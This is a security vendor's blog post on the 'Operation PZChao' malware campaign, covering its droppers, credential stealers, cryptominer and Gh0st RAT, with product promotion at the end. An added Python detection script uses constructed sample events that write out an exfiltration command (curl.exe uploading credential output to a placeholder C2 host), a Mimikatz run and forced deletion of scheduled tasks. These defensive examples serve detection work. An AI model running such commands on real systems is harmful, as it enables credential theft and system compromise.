Barkly vs Malware
Barkly Research
Feb 2018

New Data-Stealing, Cryptomining Malware Campaign on the Rise


A sophisticated malware campaign is infecting computers across the U.S. and Asia, dropping several payloads including a cryptominer, password stealers, and the Gh0st RAT trojan. Here's what you need to know.

Researchers at Bitdefender have unearthed a specialized multi-staged piece of malware that is spreading across Asia and the United States. Dubbed "Operation PZChao," the campaign appears to be focusing on organizations in the education, technology, government, and telecommunications sectors.   

Researchers believe the tactics, infrastructure, and payloads are reminiscent of previous campaigns executed by the notorious Chinese APT group Iron Tiger that dropped the Gh0st RAT trojan. Also referred to as “Emissary Panda” or “Threat Group-3390,” Iron Tiger has been active since 2010 and is suspected of conducting a variety of espionage campaigns in China and other countries in Asia.

The current PZChao campaign is believed to have been in active circulation since July 2017. The malware — delivered primarily via spear phishing emails — is quite complex, keying up a variety of functions for the attackers ranging from password stealing to complete remote access and control. Notably, it also drops a cryptocurrency mining component — making it part of a growing list of malware campaigns experimenting with cryptomining as an additional source of revenue.

How victims are getting infected

According to Bitdefender, delivery of the malware appears to be carried out via targeted spear phishing emails, which come in two flavors — the first contains a malicious VBS file attachment, while the second attaches a self-extracting 7zip file.

In both cases, the attachments serve as downloaders for subsequent payloads. The walkthrough below will focus on the 7zip attachment version of the attack, which takes an interesting approach to downloading/uploading data to and from attacker controlled servers. 

How the attack works


Operation PZChao attack diagram — Barkly provides defense-in-depth by blocking multiple stages of the attack.

Once executed, the self-extracting 7zip file drops two batch scripts (up.bat and new.bat), along with curl.exe, a legitimate application for transferring data (more on why that's important). 

The role of the ‘up.bat’ script is to rename the new.bat script to ‘win32shell.bat’, assign system file attributes, modify its access control list (ACL), and kill all scheduled tasks that might interfere with the attack.

The role of ‘win32shell.bat’ is multifaceted. Its first job is to act as a dropper for a batch script called ‘360.bat’ (named to masquerade as a popular security suite in China). Its second job is working with 360.bat and curl.exe to upload sensitive system information (e.g., passwords) to the C2 server at ‘’. The script’s final task is to contact the download server at ‘’ to pull five additional payloads.

The stage two payloads are quite diverse and provide the attackers with several different avenues for translating their control over infected machines into profit. 

Payload 1: Bitcoin Miner

It's perhaps no surprise to anyone who's been following recent malware trends that the first payload dropped onto the infected machine is a cryptomining application. While the majority of the cryptomining malware we've seen has been geared to mine Monero (for an example, see our post on Digmine), this cryptominer is staying "oldschool" and mining Bitcoin. 

The miner application is run as java.exe. To help it evade detection and fly under the radar it's scheduled to mine only every three weeks at 3am. 

Payloads 2 and 3: Credential Stealers

In addition to mining Bitcoin, the attackers are also after victim credentials, which they attempt to extract using an implementation of Mimikatz.

The malware deploys two versions (pass32, pass64) of the Mimikatz implementation to run specifically on both x86 and x64 architectures. These are executed by the 360.bat script and once credentials are collected they get uploaded to the C2 server via curl.exe.
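As an added example (not code from Bitdefender's or Barkly's research), the script below turns the chain described above into detection heuristics and runs them over constructed process-creation records. The command forms, file paths, task name and C2 URL are assumptions for illustration, not indicators taken from the campaign.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple

@dataclass
class ProcEvent:
    parent: str    # parent process image name
    image: str     # created process image name
    cmdline: str   # full command line

def _rx(pattern: str) -> Callable[[ProcEvent], bool]:
    """Build a predicate that tests the command line against a regex."""
    compiled = re.compile(pattern, re.I)
    return lambda ev: compiled.search(ev.cmdline) is not None

# Heuristics for the behaviours in the write-up: dropped batch names, the
# system attribute and ACL change on the renamed script, forced task deletion,
# the pass32/pass64 Mimikatz builds, the 3am java.exe miner schedule and a
# curl.exe upload launched from a script. Command forms are assumed.
RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("known dropped batch name", _rx(r"\b(up|new|win32shell|360)\.bat\b")),
    ("system attribute set on .bat", _rx(r"^attrib\b.*\+s\b.*\.bat")),
    ("ACL change on .bat", _rx(r"^icacls\b.*\.bat")),
    ("forced scheduled-task deletion", _rx(r"^schtasks\b.*/delete\b.*/f\b")),
    ("pass32/pass64 Mimikatz build", _rx(r"\bpass(32|64)\.exe\b")),
    ("java.exe scheduled at 03:00", _rx(r"^schtasks\b.*/create\b.*\b03:00\b.*java\.exe")),
    ("curl.exe upload spawned by a script",
     lambda ev: ev.parent.lower() == "cmd.exe" and ev.image.lower() == "curl.exe"
     and "http" in ev.cmdline.lower()),
]

def scan(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """Return (image, rule name) for every rule each event triggers."""
    return [(ev.image, name) for ev in events for name, pred in RULES if pred(ev)]

# Constructed sample telemetry (not real logs); the URL is a placeholder.
SAMPLE_EVENTS = [
    ProcEvent("7zsfx.exe", "cmd.exe", r"cmd.exe /c C:\Users\Public\up.bat"),
    ProcEvent("cmd.exe", "attrib.exe", r"attrib +s C:\Users\Public\win32shell.bat"),
    ProcEvent("cmd.exe", "icacls.exe", r"icacls C:\Users\Public\win32shell.bat /deny Everyone:(R)"),
    ProcEvent("cmd.exe", "schtasks.exe", "schtasks /delete /tn * /f"),
    ProcEvent("cmd.exe", "cmd.exe", r"cmd.exe /c C:\Users\Public\360.bat"),
    ProcEvent("cmd.exe", "pass64.exe", "pass64.exe > out.txt"),
    ProcEvent("cmd.exe", "curl.exe", "curl.exe -F file=@out.txt http://c2.example.invalid/up.php"),
    ProcEvent("cmd.exe", "schtasks.exe", r"schtasks /create /sc weekly /mo 3 /st 03:00 /tn Updater /tr C:\ProgramData\java.exe"),
    ProcEvent("explorer.exe", "notepad.exe", "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for image, rule in scan(SAMPLE_EVENTS):
        print(f"{image:14} {rule}")
```

Any single rule is noisy on its own (attrib and icacls are routine admin tools); the value is in several of them firing from the same cmd.exe lineage within a short window.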

Payload 4: Gh0st RAT

The last payload downloaded is a modified version of the Gh0st remote administration tool (RAT). This application contains all the code required to install the RAT server service. Once the service is installed, the system becomes completely compromised and the attacker is given the following capabilities:

  • Listing of all active processes and opened windows
  • Real-time and offline remote keystroke logging
  • Remote listening of conversations via microphone
  • Eavesdropping on webcams' live video feed
  • Full access to remote shell and reboot of the system
  • Ability to download binaries from the Internet
  • Complete file explorer capabilities


Payload 5: Port Scanning tools

In addition to these primary payloads, the server is also hosting port scanning applications, which can be used by the attackers to probe the victim's network for additional vulnerable systems and opportunities for lateral movement. 

Evading detection at the network level

The hacking group behind this campaign has control over at least five malicious subdomains of the domain. Each of these subdomains provides a specific functionality (ex: upload, download, RAT actions, malware DLL delivery).

The trojan’s continuous rotation of the C&C server helps it evade detection at the network level. Another trick that helps the malware stay under the radar is changing the C&C address to localhost when the attacker is not using the infrastructure.

A sign of more attacks to come?

According to the researchers, although the tools used in this particular attack are a few years old, they are battle-tested and primed for deployment in future campaigns. In particular, use of Gh0st RAT variants previously utilized by the Iron Tiger APT group suggests this may be a new campaign operated by experienced and advanced attackers who were previously very active. If that's the case, organizations need to be prepared to face similar attacks in the near future.

With this trojan packing so many post-exploitation capabilities (data exfiltration, cryptocurrency mining, complete remote control, etc.), the emphasis needs to be on blocking attacks as early in the attack chain as possible — ideally preventing infection in the first place. 

That's exactly the approach Barkly takes to blocking this threat by preventing the initial self-extracting 7zip attachment from fully executing. While that effectively nips the attack in the bud, we've also tested each payload and confirmed Barkly provides additional defense in depth by blocking each of those, as well. 


Barkly blocks the initial 7zip self-extracting file as well as each of the attack's payloads.

Learn more about Barkly's unique approach to protection and find out how it covers critical gaps in antivirus coverage by downloading our AV Gap Analysis.  

For more practical tips on how to protect your company against this and other modern attacks, see our 2018 Cybersecurity Checklist.




Barkly Research

Barkly's malware research team is hard at work stopping new malware that sneaks past antivirus.

